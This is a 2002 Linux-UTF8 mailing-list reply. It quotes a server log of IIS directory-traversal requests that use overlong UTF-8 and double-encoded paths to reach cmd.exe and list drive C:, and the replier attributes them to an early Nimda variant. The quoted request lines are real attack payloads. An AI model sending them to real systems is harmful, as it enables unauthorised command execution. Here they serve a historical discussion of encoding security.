On 2002-02-14 22:50 Markus Kuhn wrote: > For those of you still wondering what I was worried about a few years > ago with regard to overlong UTF-8 sequences, here some extract from > our httpd log files: > > ... > GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET >/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ >HTTP/1.0 > GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET >/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ >HTTP/1.0 > GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ >HTTP/1.0 > ... > > P.S.: Has anyone an idea, which IIS worm performs the above HTTP > vulnerability tests? Is it one of the later Nimda variants or > something else?
Think it is one of the earliest Nimda variants. My access_log and error_log was flooded with similar false hits. About 190.000 hits like that in one day. Think it was around 2001-09-19, after some days it decreased quite rapidly. Filled up my log partition first, though. Quite annoying. I really wonder how much bandwith resources those worms throw away. Guess when micro$oft gets this .net thing on track with their funny protocols things will not actually improve. �yvind +===================================================================+ | OpenPGP: 0xAD19826C 2000-01-24 �yvind A. Holm <[EMAIL PROTECTED]> | | Fingerprint: EAE5 DCA0 0626 5DAA 72F8 0435 2E2B E476 AD19 826C | +=========== 2 + 2 = 5 for extremely large values of 2. ============+ -- Linux-UTF8: i18n of Linux on all levels Archive: http://mail.nl.linux.org/linux-utf8/
